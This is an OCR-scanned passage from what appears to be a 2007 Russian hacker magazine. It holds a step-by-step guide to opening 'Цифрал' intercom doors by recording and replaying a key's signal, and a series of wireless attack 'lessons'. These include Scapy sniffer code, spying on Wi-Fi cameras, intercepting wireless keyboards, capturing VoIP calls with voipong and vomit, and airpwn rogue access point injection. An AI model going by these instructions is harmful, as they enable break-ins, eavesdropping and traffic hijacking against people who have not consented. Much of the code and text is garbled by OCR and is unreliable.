потребления микросхемы ключа с фиксированным периодом. Причем 
длительность импульса для состоянии «лог.О» и «лог.1 » различна, как 
показано на временной диаграмме. 

Таккакпри чтении данных из ПЗУ влюбой моментвозможно нарушение 
электрического контакта считывающего устройства с корпусом прибора, то 
необходимо контролировать целостность считываемых данных. Для этой 
цели кодовая комбинация считывается из ПЗУтри раза подряд и сравни- 
вается считывающимустройством (персональная ЭВМ, микропроцессор- 
ный контроллер). Втом случае, если коды совпали, серийный номер считан 
верно. В противном случае выполняется повторное чтение данных». 

Проще говоря 

Иными словами, как только мы вставим ключ в приемную лузу, он будет 
тарахтеть в нее кодом дотех пор, пока мозги домофона не решат, что код 
правильный, и не откроют нам желанный Сезам. В принципе опять же 
можно было бы с помощью микроконтроллера сваять эмулятор, но у нас 
есть способ проще и интереснее! 

Поскольку домофон «Цифрал»только слушает ключ-идентификатор и 
вообще не использует какой-либо протокол обмена, путь для обхода весь- 
ма и весьма прост. Следует л ишь за писать тарахтение ключика, а потом 
воспроизвести этузапись домофону. 

К несчастью, лобовое решение — магнитофон — тут не подойдет. Коэф- 
фициент детонации популярных китайских проигрывателей таков, что 
даже не обладающий музыкальным слухом домофон тутже заметит лажу. 
Что та му тебя еще есть из звукозаписывающей техники? Ну компьютер со 
звуковухой есть наверняка! Значит, можно записать тарахтение ключика 
и потом просто зажечь его на Сй. Воспроизвести запись не проблема, на- 
пример, через портативный Сй-плеер, который точно имеется в наличии 
у каждого второготвоего знакомого. Впрочем, даже если вдруг Сй-плеер 
ты не разыщешь, сойдет и цифровой диктофон или сотовый телефон. 
Правда, мобила подойдет не всякая, но об этом мы расскажем далее. 



Переходим к делу: слушаем ключик 

Для записи «музыки» ключей «Цифрал» нам понадобится источник 
питания 2,4-5 В. Можно использовать блок питания компьютера, но 
высока вероятность того, что он добавит в нашу запись ненужные шумы 
итем самым испортит«произведение». Поэтому лучшезапастисьдвумя 
любыми батарейками, которые в сумме обеспечат нам 2,4-3 В. Для тех, 
кто втанке, напомним, что питание +5 В можно получить какот разъема 
ІІ5В-порта,так и от некоторых ѲАМЕ-портов, подавив шумы компьютера 
простейшим фильтром из дросселя и конденсатора. Далее, нам будет 
нужно сопротивление номиналом 1 ,5-2,2 кОм любого вида и исполнения. 
Из этих комплектующих собираем очень сложную схему из трех элементов 
для прослушивания нашего ключика. 

В зависимости от номинала сопротивления и напряжения питания схемы, 
амплитуда «цифровой музыки» составит0,3-0,5 В на уровне постоянной 
составляющей 1 ,0-1,5 В, что позволит подать этот сигнал непосредствен- 
но на линейный вход звуковой карты. 

Если в наличии имеетсятолько микрофонный вход, какэто бываету 
некоторых моделей ноутбуков и у сотовыхтелефонов, схему придется 
усложнить, добавив делитель напряжения из двух резисторов, один из 
которых переменный. Манипулируя ручкой переменного резистора РЗ, 
следует обеспечить на микрофонном входе амплитуду сигнала порядка 
0,5-1 ,2 мВ. 

Далее включаем свой любимый звукозаписывающий софт. Лучше, ко- 
нечно, что-нибудьтипа Сооі Ебіі [ ѵѵѵѵѵѵ.вупІгіШит.сот ). ЗоипсІ Еогде 
[ ѵууѵѵу.вопѵсгеаЛѵевоЛѵѵаге.сопп ) или хотя бы Тоіаі Ресогбег 
( ѵѵѵѵѵѵ.ЫдНсгііегіа.сот ). Подойдет все, что имеет виртуальные индикаторы 
уровня записи и позволяет на глаз выставитьуровеньзаписываемого 
сигнала без перегрузокзвукового тракта карты. ...Ну на нет и суда нет! 
Можно использовать и обычную «Звукозапись» из стандартного набора 
ѴѴІпбоѵѵз, хотя в этом случае, возможно, придется сделать несколько 
записей, чтобы подобрать приемлемый уровень. 

В используемой программе выбираем источниксигнала (тот, куда мы 
подключились: «Микрофон» или «Линейный вход»), после чего записы- 
ваем обыкновенный звуковой файл с расширением ѴѴАѴ с параметрами: 
РСМ 44100 Гц, 16 бит, моно длительностью 1-2 минуты без применения 



1 

:: 


, С.т»ри , Чіирп н ГЛѴР* іРіТЬри 

:[ 1 1 а п 1 II п :і а п о вофі 

міитппішпл пппп_ 

1 1 1 ■ I Ч І ■ 1 ■ І 

■ М ч 1 і 1 ч 1 9 

Ф&Л Н ф А ^ і ' Р 




Тп 1 ■■ Іі'ЧТп !>■■- 1Тп * 


Дл 


ительность импульса для состояния «лог.О» и «лог.1 » различна 
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На дискеты найдешь 
программы, упо- 
мянутые в статье, а 
также мидлеты для 
твоего мобильника. 




какой-либо компрессии сигнала. В принципе для домофо- 
на хватило бы и 5 секунд, нотакой запас просто позволит в 
нужный момент действовать без излишней суеты. В случае 
еслиты хочешьсделать запись при помощи мобильника, 
нужно позаботиться, чтобы тотумел захватывать звук через 
гарнитуру. Тут, конечно, придется отрезать сам микрофон от 
гарнитуры, а если жалко — спаять отдельный провод с разъ- 
емом и прицепитьего к выходу делителя. Но это реально! 

Двигаемся далее 

Итак, искомый файл или несколько ѴѴАѴ-файлов от разных 
ключей получены! Самое время прожечь их на компакт-диск 
в виде музыкальных файлов сба, в чем нам поможет всем 
известная Ыего [ ѵѵѵѵѵѵ. пего .сопл ) или любая другая аналогич- 
ная программа. Можно записать и просто какѴѴАѴ-файлы, 
если Сй-плеер поддерживает та кой формат. При записи 
в формате трЗ кодовая информация может быть утеряна 
в процессе сжатия, в этом случае надо выставить опции 
максимального битрейта и максимального качества фор- 
мируемого трЗ-файла. В окне Сооі Есііѣ форма сигнала при 
этом остается неискаженной, но, какэто воспримет домофон, 
я не в курсе. Если при записи в мобильник применяется алго- 
ритм сжатия с потерями, затеянный фокус, скорее всего, не 
удастся, но попробовать все равно стоит. В крайнем случае 
ѴѴАѴ-файл можно сформировать на компьютере, а в мобилу 
затаскивать как качественный трЗ через Оаіа-кабель, ІРОА 



или ВІиеІооіЬ. Количество вариантов здесь довольно вели- 
ко, всезависит от используемой мобилы. Возможно, даже 
придется сваять простенький мидлет на баѵа. К счастью, 
даже в стандартной поставке 62МЕ ѴѴІгеІезвТооІкіі 2.2 Ьеіа 2 
есть примерзакачки и воспроизведения музыки в формате 
ѴѴАѴ. Если тебе это кажется нереальным, два готовых мидле- 
та прилагаю. Тебе останется только раззиповатьіаг-файл, 
положить в архив свой ѴѴАѴ-файл ключа под именем 
ту_кеу.ѵѵаѵ (или ту_кеу_Х.ѵѵаѵ, в папку аибіо), зазиповать 
все это обратно и должным образом втащить в мобилу. Сам 
файл ключа не должен быть очень большим — могут возник- 
нутьтраблы призакачке. Секунд5-10 вполне достаточно, тем 
более что мобила будет проигрывать его непрерывно по кругу. 

Пора действовать 

Ну что, откроем парудверок? Вместо наушников, припаива- 
ем к шнурку с разъемом сопротивление номиналом 
680-820 Ом для согласования со схемой считывающего уст- 
ройства домофона «Цифрал». Оба канала стереофоническо- 
го кабеля включаются параллельно, согласно приведенной 
схеме. Нагрузка величиной 680-820 Ом значительно превы- 
шает сопротивление распространенных наушников и выход 
плеера перегрузить не должна, если, конечно, кривые руки 
не спаяли что-нибудь накоротко, но производители чаще 
всего заботятся о дураках, и есть надежда, что в плеере или 
мобиле применена защита выхода от короткогозамыкания. 
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плитуда «цифровой музыки» составляет 0,3 - 0,5 В на 
овне постоянной составляющей 1 ,0 - 1 ,5 В 
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Кзаписи готов! 



Чтобы иметь некоторую уверенность в успехе, выход Сй-плеера или 
мобильника должен развивать на нашей нагрузке переменный сигнал 
амплитудой не менее 0,5 В. Если есть возможность воспользоваться 
осциллографом, посмотри амплитуду сигнала на нагрузке. В противном 
случае придется покрутить регулятор выходного сигнала СБ-плеера в 
полевыхусловияху вожделенной двери. Впрочем, вероятность успеха 
весьма велика — у меня, например, без всяких настроек дверь открылась 
сразу при максимальной громкости. 

Программытипа Сооі ЕсМ! и ЗоипсІ Еогде позволяют увидеть форму сиг- 
нала и без осциллографа. Можнотакже заюзать различные софтварные 
осциллографы, использующие железо звуковой карты. Количествотаких 
программ, разбросанных на просторах Сети, весьма велико. В любом 
случае правильная форма записанного сигнала должна ориентировочно 
соответствовать приведенной на рисунке. 

Если выбросы сигнала, указанные на рисунке цветными кружками, 
значительны и пересекаютлинию нулевого уровня, то, вероятно, запись 
сигнала придется повторить с другим уровнем записи или отредактиро- 
вать сигнал вручную, уменьшив амплитуду выбросов. Нов подавляющем 
большинстве случаев необходимое качество ѴѴАѴ-файла достигается с 
первого-второго раза даже при весьма средних параметрах самой звуко- 
вой карты (я лично юзал древнюю Е55-1868). 

Упрощаем отладку 

Чтобы не торчать уйму времени у домофона, напоминая озабоченного 
террориста, для отладки можно использовать простенькую софтину 
СУЕ_КЕУ.СОМ, которая позволяет считывать коды ключей через БРТ-порт 
компьютера. 

Для аппаратного обеспечения программы необходима схема компара- 
тора или триггера Шмитта, запитываемая от напряжения +5 В разъема 
ІІ5В-порта или ѲАМЕ-порта. Подобныеустройства в недавнем прошлом 
широко применялись в схемах популярных 8-битных компьютеров типа 
«Синклер», РК-86, «Орион», «Микроша» для ввода программ и данных, 
записанных на магнитофонные кассеты. Если со сбором подобной схемы 
утебя возникаюттраблы, можно попробовать обойтись более простой 
конструкцией, но в этом случае придется подобрать резистором Р2 посто- 
янное смещение на входе Визу порта принтера. 

Программа СУЕ_КЕУ.СОМ использует прямое обращение ктаймеру и 
портам ввода-вывода, поэтому запускать ее следует из-под голого 005’а, 
благо небольшой размер программы позволяетей поместиться на сис- 
темной дискете. При правильном определении кодов ключей программа 



выводит их список, при сбоях или ошибках в сигнатуре ключей возможно 
отображение символа «Е» (Еггог). Для того чтобы убедиться в работос- 
пособности аппаратной части, программу необходимо запустить на двух 
разных компьютерах, соединив между собой их выходы ЗігоЬе с входами 
Визу и запустив одну из программ в режиме чтения ключа, а другую — в 
режиме эмуляции ключа из файла. 

Неприятным обстоятельством может бытьто, что где-нибудь на этапе 
создания или воспроизведения файла звуковой тракт инвертирует сиг- 
нал ключа. Шанс при современной аппаратуре очень небольшой, но кто 
знает, что тамтворят китайцы для удешевления своей продукции. Втаком 
случае без звукового редактора не обойтись, поскольку сигнал перед 
записью придется инвертировать. 

Наводим марафет 

Для сопряжения с лузой лучше смастерить простую конструкцию, поз- 
воляющую не лезть кдомофону с оголенными проводами в руках, да и 
не элегантно это. Поскольку на всю эту фигню мы не потратили пока еще 
даже и обрезка от бумажки с зелеными комиссарами, контакты ключа так- 
же можно выполнить в стиле «Хакера» из подручных материалов: картона, 
жести и любого суперклея. 

При наличии прямых рук может получиться весьма симпатичный девайс. 

В любом случае ободок лузы — контакт общего провода (оплетки кабеля), 
а центральный круглый контакт — сигнальный. 

Включаем СБ-плеер или мобильный телефон на воспроизведение 
файла ключа, уровень громкости максимальный. С уверенным (злым, 
глупым, коварным и т.д. — на выбор) выражением лица говорим вол- 
шебное слово: «Цифрал, откройся!», подключаем девайс к лузе домо- 
фона, и железный монстр с печальным звуком: «Длиньк!» — должен 
пасть! Можно, конечно, и без театральных эффектов, да и фраза — на 
твое усмотрение, но если уж решил поразить девушку, потрениро- 
ваться следует заранее, особенно с уровнем громкости... С 0-плеера 
(мобильника). 

Напоследок 

Разумеется, предложенный способ эмуляции ключей-идентифи- 
каторов «Цифрал» — самый простой. Заметим, что крутые перцы, 
владеющие языком программирования Заѵа для мобильных устройств 
Д2МЕ) и обладающие навороченными смартфонами, могут сбацать 
универсальный ключ для любых систем, как Той с Ь Мегтюгу Субга I 
ОС-2000, так и Той сб Мегтюгу 051990, без существенных аппаратных 
затрат исключительно программным путем, манипулируя сигналами 
СОМ -порта мобильника. Основное препятствие заключено в версии 
установленной в телефоне За ѵа- машины, в том, имеет ли она разви- 
тые средства управления последовательным портом. В положитель- 
ном случае аппаратно придется выполнить лишь несложные цепи 
согласования электрических уровней СОМ-порта мобильника и схемы 
считывания/эмуляции ключей ТоисЬ Мегтюгу. 

Безусловно, все перечисленные в статье названия фирм, програм- 
мных продуктов и торговых марок — неотъемлемая собственность их 
владельцев. Предоставленная информация нисколько не провоциру- 
ет на незаконные действия, а преследует цель указать фирмам и про- 
изводителям на недостатки и дыры в их продукции, а также позволить 
всем простым смертным перцам (как фрикерам и хацкерам, так и не 
являющимся ими) не таскать с собой связки пластмассовых ключей 
и не рвать волосы на голове (или еще где-либо) в случае их потери. 

Как бы то ни было, сохрани в компьютере дубликаты, в экстренной 
ситуации не помешают! т 
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Беспрецедентное 
хамство в ѴѴі-Рі сетях 



5 новых уроков западлостроения 

Для того чтобы положить ноутбук в рюкзак и запустить сканер беспроводных сетей, большого 
ума не надо. Можно долго ходить по окрестностям, до умопомрачения сканить эфир и, возмож- 
но, даже возомнить себя великим вардрайвером, но что с того? Тупое сканирование наобум 
едва ли даст желаемые результаты, а кайфа от этого — ноль. Поэтому недолго думая мы решили: 
если уж глумиться в беспроводных сетях, то по полной. И вот что из этого получилось. 



И азуж развелась куча девайсов, использующих беспровод- 
| ную связь, а люди безнадежно привыкли кѴѴІ-РІ, почему бы 
I немного не поприкалываться. В конце концов, пора спустить 
бедняг на землю и напомнить им, что лучше дедовских 
проводных соединений до сих пор ничего не придумали. Оказалось, что 
подходящих способов поглумиться над ѴѴІ-РІ пользователями не один и не 
два, а привычные инструменты для взлома можно написать самому. При 
наличии желания, естественно. Вот, пожалуй, с этого и начнем. 

Урок №1 . Ловкость рук и никакого мошенничества 

Какой вообще смысл в западлостроении? Правильно, получить очеред- 
ную порцию кайфа и адреналина. Если речь идет о ЫдЬ іесб западлост- 
роении, очень важно сделать все самому с нуля. Ну, скажем, какой прикол 
использоватьуже готовые инструменты типа МеівіитЫег'а для поиска 
беспроводных устройств? Тут и делать-то ничего не надо: просто запустил 
программу и все. Другое дело — смастерить свой сканер, показать его 
друзьям и подумать, какего еще улучшить. Тем более что во всех паблик- 
утилитах (ЫеівІитЫег, ОБШтЫег, ѴѴеІІеп геііег) содержатся так назы- 
ваемые «пасхальные яйца», по сигнатурам которых можно определить 



стороннюю активность и взять за яйца уже тебя. Поэтому сейчас мы 
сделаем собственный сканер, который будет осуществлять пассивное 
сканирование сети методом перехвата 35Ю-идентификаторов. 

Весь проект займет несколько строчек кода на РуіИоп (в прошлом номере 
сего помощью мы написали свою навигационную систему), а в основу мы 
положим замечательную библиотеку Беару ( ѵѵѵѵѵѵ.зессІеѵ.огд/ргоіесіБ/всарѵ ). 
предназначенную для манипуляции сетевыми пакетами. Ксожалению, под 
Виндой это реализуется на несколько порядков сложнее, поэтому в качестве 
платформы мы выберем І_іпих. Собственно, ничего страшного в этом нет, 
объясняю почему. Во-первых, дистрибутив подходящих никсов в лице 5І_АХ 
[ ѵѵѵѵѵѵ.зіах.огд і будет на нашем диске; во-вторых, драйверы для беспровод- 
ных интерфейсов устанавливаются там автоматически; в-третьих, тебе даже 
не придется заморачиваться по поводу РуіЬоп’а. Надо будеттолько скачать 
нужную версию библиотеки и установить ее в системе: 



ссі /зсару/ & руДЬоп зеДир.ру іпзДаІІ. 



И все! Развежэто сложно? Далее приступаем к составлению самой 
программы. Наш сканер будет палить специальные фреймы, которые 



► 030 



ХАКЕР 08 / 1 04 / 07 





рс_Еопе 




содержат уникальный идентификатор сети 55Ю (Бегѵісе 5еі ИепііЛег) и 
рассылаются точкой доступа. Ихтакже называют Веасоп-фреймами. По 
ним мы и будем определять найденные сети. 



ітрогД зуз 

ігот зсару ітрогД * 

ргіпб "М-Еі 88ІБ раззіѵе зпіііег " 

іпСегіасе = зуз.агдѵ[1] #задаем название интерфейса в 
качестве дополнительного консольного аргумента 

бе! зпіііВеасоп (р) : 

ІГ р . казіауег (БоГІІВеасоп) : 

ргіпб р. зргіпбі ( " %БоШ . ас!с1г2% [%Бо1і11ЕІЦ . 
іпРо% I %БоД11Веасоп. сар%] " ) 

зпііі ( іРасе=іпВегРасе ,ргп=зпіРРВеасоп) 



Вывод программы содержит информацию о перехваченных Веасоп- 
фреймах: 



зкѵо 2 @Ьох: зпіііззіб.ру екМ 

00:12:17:3с: Ъ6:еб[' пекздиаге4 ' I зкогк-зІок+ЕЗЗ 
00:30 :Ьс1: са : 1е : 1е [ 'пекздиаге7 ' | Е83+ргіѵасу] 



Советую тебе также поэкспериментироватьс выбором Иазіауег 
(параметра мониторинга), поменяв его значение БоЮ 1 Веасоп 
на: йоП 1 АззоРезр, йоП 1 РгоЬеРец, БоП 1АТІМ, БоП 1 АиіЬ, 
йоН 1 РгоЬеРезр, йоіі 1 АсИг2МАСЕІе[сІ, йоіі 1 Веасоп, Ооіі 1 РеаззоРец, 
йоН 1 АсИгЗМАСРІеШ, йоіі 1 ОеаиіЬ, йоіі 1 РеаззоРезр, 
йоП 1 АсИгФМАСЕІеШ, йоП 1 0ізаз, йоП ШЕР, йоШ АббгМАСРіеШ, 
йоП 1 Ей, йоіі 1 АззоРец, йоП 1 РаскеіЫзЕ Так можно перехватить нетоль- 
ко 55Ю точки доступа, но и всюостальную информацию о сети. Кпримеру, 
узнать информацию о физических идентификаторах пользователей и 
сетевых обращениях. Для этого мы задействуем протокол АРР: 



ішрогб зуз , 03 
Ігош зсару ітрогб * 




іпДегіасе = гаѵ\г_іприб ( " епбег іпбегіасе" ) 
задает интерфейс сети 


) Пользователь 


оз . рореп ( " іѵлзопіід іпбегіасе шобе шопіЕог" ) #перевод 
карты в режим монитора на заданном интерфейсе 


#функция перехвата МАС 
беі зпіІШАС (р) : 




р .казіауег (БобП) : 




шас = р . зргіпбі ( " [ %БоЦ11 . аббг1% ) | 


(%Бок11 . 


аббг2 % ) | ( %Бо1:11 . аббгЗ %.}]") 





ргіпВ тас 

#функция перехвата ІР-адресов и показа АКР сообщений 
беі зпіііагрір (р) : 

іі р . казіауег ( ІР) : 

ір = р . зргіпВВ ("ІР— [ %ІР . згс% ) I ( %ІР . бзб% ) ] " ) 
ргіпВ ір 

еііі р . казіауег (АКР) : 

агр = р . зргіпбі ( " АКР — [ % АКР . Іжз г С % ) I (%АКР. 
рзгс% ) ] - [ %АКР . Ъж3.зб% ) I ( %АКР . рбзб% ) ] " ) 
ргіпВ агр 

# уровни, которые мы мониторим 

зпііі ( ііасе=іпВегіасе ,ргп=зпіііМАС , ргп=зпіііагрір) 
Вывод : 

зкѵо 2 @риііу: руВкоп зпіВВ.ру еВЫ 

[ВВ: ВВ: ВВ: ВВ: ВВ: ВВ) | ( 00 : 3 0 : Ъб : са : 1е : 1е) I (00:30:Ьб: 
са : 1е : 1е) ] 

ІР - [192.168.7.41) | (192.168.7.3) ] 

АКР - [ 00 : 0В:аЗ : 1В: Ь4 : ВВ) | (192.168.7.3) ]- [00: 00: 00: 00 
: 00 : 00 ) I (192.168.7.41) ] 



Урок №2. С глазу на глаз 

Ну вот — сканер готов, можно двигаться дальше. А дальше, кстати говоря, 
самое интересное. Я уже сказал, что беспроводную связь сейчас исполь- 
зуют самые разные девайсы, втом числе беспроводные видеокамеры, 
радиотелефоны, домашнее оборудование, работающее по протоколу хі О, 
и даже некоторые автомобильные сигнализации. Не знаю, как у тебя, а у 
меня прямо руки чешутся — такхочется подключиться ксистеме видеока- 
мер какой-нибудь организации и посмотреть, кто, чем и где занимается. 
Думаешь, это невозможно? Ошибаешься. Процесс нахождения и эксплу- 
атирования в своих целях подобных девайсов называется ѵѵагѵіеѵѵіпд 
(иначе ѵѵагзруіпд) и впервые был упомянут в культовом журнале «2600». 
Большинство камер не имеет шифрования, поэтому перехватить переда- 
ваемую ими картинку, вообще говоря, ничего не стоит. И даже если попа- 
дется камера с пресловутым ѴѴЕР-шифрованием, ничего не изменится. 
Поскольку «глазик» постоянно нагнетаеттрафикза счетсвоего вещания, 
можно оченьбыстро перехватить необходимое для взлома количество 
инициализационных векторов (IV) и расшифровать ключ. Камеры в боль- 
шинстве своем работают по четырем каналам передачи сигнала: 



скаппеі 


А = 


2,411 


ГГц 


скаппеі 


В = 


2,434 


ГГц 


скаппеі 


С = 


2,453 


ГГц 


скаппеі 


Б = 


2,473 


ГГц 



Обычно для поиска таких аппаратов используют направленную антенну 
для усиления сигнала и видеоресивер, а в случае необходимости еще 
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рс_Еопе 



» 




> Ипкз 

Познакомиться с ис- 
кусством ѵѵагіуріпд’а 
ты сможешь на 
этом ресурсе: ѵѵѵѵѵѵ. 
ѵѵагіуріпд.сот. 

Там же приведены 
примеры частот для 
наиболее популяр- 
ного оборудования. 




> ѵісіео 

На диске выложен 
наглядный пример 
поиска контроль-па- 
нели беспроводной 
ѴѴІ-РІ камеры для 
контроля периметра 
с помощью утилиты 
НаисШюг, написанной 
кодером К51ІНІ. 







> ІП^О 

Проникся темой и 
уже готов бежать на 
улицы своего города 
на поиски беспро- 
водных сетей? Рад, 
если это так, только 
знай меру. Буду при- 
знателен, если ты 
поделишься своими 
результатами на 
ѵѵѵѵѵѵ. ѵѵа гбгіѵег.гц . 
Это поможет общему 
делу и создаст 
детализированный 
и независимый 
отчет о современном 
радиопокрытии. 




Изображение с веб- камеры, которое мы получили, простоИ 
обратившись к веб-панели администратора, на которой был 
установлен стандартный парольД 



и отдельный экран или монитор ноутбука для просмотра 
изображения. Самые популярные модели таких ресиверов 

— [сот ІС-РЗ и Асііоп АС N-53292. У них имеется встроен- 
ный ЮБ-экран, поэтому использовать дополнительное 
оборудование не придется. Все, что оттебя требуется, 

— это настроить девайс на нужную частоту и оказаться в 
пределах радиовещания камеры. Впрочем, в большинс- 
тве случаев можно обойтись даже без дополнительного 
оборудования. Нетакдавно на страницах нашего журнала 
освещалась прога ЬаисІІог ( ѵѵѵѵѵѵ.іісіеіепсе.ги ). которая 
занимается поиском ѵѵеЬ- па нелей администратора 
различного сетевого оборудования, в том числе точек 
доступа и даже камер, внутри сети. Заюзав ее, ты сможешь 
посмотреть изображение в окне своего браузера. Тут уже 
невольно задумываешься отом, куда катится этот мир. 

Урок №3. Печатайте помедленнее! 

Сейчас многие пользователи предпочитают шиковать и 
использовать радиоклавиатуры. Азря. В Сети давно рас- 
пространяются списки с частотами, на которых работаютэти 
девайсы, поэтомулюбые данныетеоретически и практи- 
чески можно перехватить. Вотлишь малая частьсписка, 
касающаяся наиболее популярного оборудования: 



27,045, 27,095, 27 , 145 МГц — клавиатуры и 
мыши от фирм Ьодібесіт, Місгозобб и НР 
49 МГц — клавиатуры бренда Сгуабіоп 
900 МГц — беспроводные телефоны (станции 
БЕСТ, ѴоІР) 

2,4 ГГц - 8 02 .116 (М-Еі) 

2 , 4 ГГц — ВІиебообЬ. 

5 ГГц -802.11а (Мі-Еі) 



Нам понадобится чувствительный радиоприемник и 
компьютер со звуковой картой. Я приобрел не китайскую 
фигню, а профессиональный девайс Ісот Р-75, работаю- 
щий на частотах от 0,03 до 60 МГц. Устройство комплектует- 
ся самыми различными кабелями, поэтому подключить его 
к компьютеру, и в частности кзвуковушке, не соствиттруда. 
Но перехватить данные мало. Операция передачи сигнала 
между клавиатурой/мышкой и приемником происходит по 
пейджинговому стандарту данных Р0С5А. Поэтому требу- 
ется обзавестись еще и программным РОСЗАѲ-декоде- 
ром, который, используя звуковую карту, сможет получить 
вполне читаемый текст из непонятного перехваченного 
барахла: 



"А" 1010 - 1011 - 1100 - 0100 - 1001 - ООН 
- 1010 

"Раде Воші" - 1010 - 0101 - 1100 - 0101 - 1011 
- 1001 - 1010 




і и Кш-і н л аі II іаі 

'іііі-м ■ -* п*п 




Ѵоіропд в работе. Запуск .зИ сц енария позволит злоумыш-| 
леннику «вклиниться» в линиюД 



Для этого можно использовать: ЗетаБоИ 1.15, ЗетаЗоШ 6 
Ы, РОС32, Зітріе Сігсиіі, РБ203, Вгаѵо радег, РЕ200, Р0С5А6 
0есосіегѵ2.0. Отмечу, что такие фокусы очень часто приме- 
няются в промышленном шпионаже, поэтому на стеклах 
важных ведомственныхучреждений и банков зачастую 
можноувидеть алюминиевые обкладки, препятствующие 
распространению сигнала и ПЭМИН (побочного радиомаг- 
нитного излучения). 

Урок №4. Кто на линии? 

Камеры, мышки и клавиатуры — кто следующий? На очереди 
радиотелефоны. Все популярнее становится стандартѴо-РІ 
(Ѵоісе Оѵег ѴѴі-Рі), являющийся основой при создании все- 
возможных голосовых удобств для сотрудников различных 
компаний. Беда втом, что он подвержен сразу нескольким 
угрозам, среди которых перехватзвонков. Для реализации 
этой штуки нам, помимотривиального набора вардрай- 
вера (на тот случай, если задействовано шифрование или 
фильтрация по МАС-адресам), понадобятся утилиты ѴоіРопд 
( ѵѵѵѵѵѵ.епсіегцпіх.огд/ѵоіропд ) и ѵотіі ( ѵотібхісіпебпі ). 
Предположим, ты проник в место, где расположен завет- 
ный ѴоІР-шлюз (это обычный сервер с соответствующим 
программным обеспечением или же аппаратная реализация 
с Ыпих’ом на борту), и поместил сюрприз на любую взломан- 
ную машину, которая находится втом же сетевом окружении. 
После сборки ѴоіРопд твои действия будут таковы: 

Осначала правь/изг/іосаі/еіс/ѵоіропд.сопб где нужно впи- 
сать несколько понятных параметров подключения; 

2) затем запускай сам сервер командой ѵоіропд -64. 



Подключение : 

зкѵог@риббу: беіпеб 143.245.12.12 30000 
Тгуіпд 143.245.12.12. . . 

Соппесбеб Го 143 .245.12.12. 

Езсаре скагасбег із //ч ] ' . 

ЕпбегШІХ ѴОІРСЖО Ѵоісе Оѵег ІР Зпіббег 
Шеісоше бо шападешепб сопзоіе 
Зузбет: ебе . беѵ . епбегипіх . огд [РгееВЗБ 

5 . 3 -КЕЬЕАЗЕ РгееВЗБ 5 . 3 -КЕРЕАЗЕ #0: 

тЪ@ебе . беѵ. епбегипіх . огд : /изг/згс/зуз/ 
і386/сотрі!е/ЕЕЕ І386] 



После этого не забудь а вторизироваться : 



ѵоіропд> разз ѵгогб 






Іодіп зиссеззбиіі 






ѵоіропд> Ьеір 






Сошшапбз : 






Пеір : 


бМз опе 




диіб : 


диіб шападешепб 


сопзоіе 


Іодгобабе 


: гобабе зегѵег' 


’ з Іодз 
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1 іхж дм лг^і игдоъь- 

■ѵ.ѵл.а гіти 



Г" . ,|.-«.л т» . :> : ' н.ч И&і^-іу* 

Ѵ.і Міілтк 1 .Ш і тіі.:іЦЬ| I II илы 
чі . Т| і і 4 ■- -*-с «■= ~с ч ч , | '! : і іні р^”-ИЙ 
й.-ш игн: ил і4№іі2'-і II I 



ІС □- н ониторы ^N$6 тШр 

КСН _ аС"-«-= ШУ.\ ■ Ь'Ѵ ■ ЕМІ'Й С'-^НЕс ■! ѴС 



Ммфи|:муигіііті-Бі!і шгрэсіі- І_й Ск^ишікй С-йОЗ- ЭС’С-ѴЙ-ѴЗ 

ігіпГГЛГТТІІГН ГОрЯЧТЧ ЧИІІИП ПП Нптгнн.і 

н ІЧГЛІ . I П - Г 1 1 - 






^ рс_гопе 



зЬліРйоѵт : зЪпРйоѵт зегѵег 

гизаде : СРЙ изаде зРаРізРісз Рог РЬ.е зегѵег 

іпРо : Сепегаі зегѵег іпРогтаРіоп 

ирРіте : Зегѵег ирРіте 

саШізР : 5Ь.оѵ7 сиггепРІу топіРогей саііз 

кііізеззіоп [ісі] : епй топіРогіпд зеззіоп ѵѵіРЬ. [ій] 
ѵоіропд> 



Через несколько минут/секунд/часов (как повезет) программа выдаст 
тебе заветное сообщение: 



ѴоІР саіі йеРесРей. 10.0.0.49:49606 <--> 

10.0. 0.90:49604. 

Епсойіпд : О-РСШ-8КН2 

тахітит маіРіпд Ріте [10 зп] еіарзей Рог Йііз саіі, саіі 
тідЬР Ьаѵе Ьееп епйей. 

.Ѵ/АѴ Рііе [оиРриР/2 0041119/зеззіоп-епс0-РСШ-8КН2- 

10 . 0 . 0 . 49 . 49606-10 . 0 . 0 . 90 , 49604 .маѵ] йаз Ьееп сгеаРей 
зиссеззРиІІу . 



Все, звонок перехвачен! Но прослушать его нельзя. Проблема втом, что 
файлы с аудиоданными находятся в формате, разработанном СІ5С0: 

Ѳ.71 1 . И чтобы привести их в человечески вид, придется прибегнуть к 
помощи специальнойтулзы ѵотіР Впрочем, ничего сложного вэтом нет: 



Рсрйшпр м регехѵаР .Рііе 

ѵотіР г регехѵаР . Рііе > регехѵаР .маѵ 



Урок №5. Фильтруй базар 

В завершениехочу поведать тебе прикольную историю, которая про- 
изошла на двенадцатой хакерской конференции Оеіюоп 1 2. Для удобства 
проведения этого мероприятия организаторы, само собой, подняли ѴѴІ-РІ 
сеть, обеспечив участникам возможность использовать интранет, а также 
просто тусить в онлайне. К всеобщемуудивлению, после подключения 
народ стал замечать различные приколы на экранах своих ноутбуков: 
вместо привычного 6оод[е открываласьжесткая порнуха, а графика на 
известных ресурсах была заменена элементами хакерского жаргона. 
Недоумение рассеялось после выступления умельца по имени Дейв из 
ѵѵѵѵѵѵ.еѵіІзсЬете.огд — автора утилиты а ігрѵѵп. которая, собственно, и 
натворила столько дел. 

В основе этого фокуса лежитэмуляция ложнойточки доступа ( Еѵі [ Тѵѵі п/ 
Водие АР), которая может осуществляться разными способами. Рекомен- 
дуется использовать две РСМСІА- или СР-карты: одну для мониторинга 
сети на предмет запросов пользователей, а вторую для организации 
[аке-АР. Так как моя карточка поддерживает программный переход в ре- 
жим мониторинга (топі!огтобе),то последовательность моих действий 
примернота кова: 

1. На ноуте я поднимаюточку со схожим идентификатором 55Ю: 



іѵдргіѵ мІапО РюзРарй 

імсопРід \ѵ1ап0 шойе тазРег #номер канала# еззій #Хакер# 



2. Другую же карту перевожу в режим монитора; ее предназначение втом, 
чтобы в общем потокетрафика обнаружить запросы, правила на которые 
мы составили в конфигурационных файлахаігрѵѵп. 



імргіѵ еРкО топіРог 
іРсопРід мІапОар ир 



3. В конфиге аігрѵѵп прописываю: 



Ьедіп аігрѵтей_ітд 

таРсЪ. '''СЕТ [ л ]+\. ( ?і : зрд I зред I діі I рпд) 



орРіоп гезеР 

гезропзе сопРепР/аігр\ѵпей_рпд 



4. В папке сопіепі создаю файл со следующим содержимым: 



НТТР/1.1 200 ОК 
СоппесРіоп: сіозе 
СопРепР-Руре : ітаде/рпд 
СопРепР-ІепдРЬ : 1037 

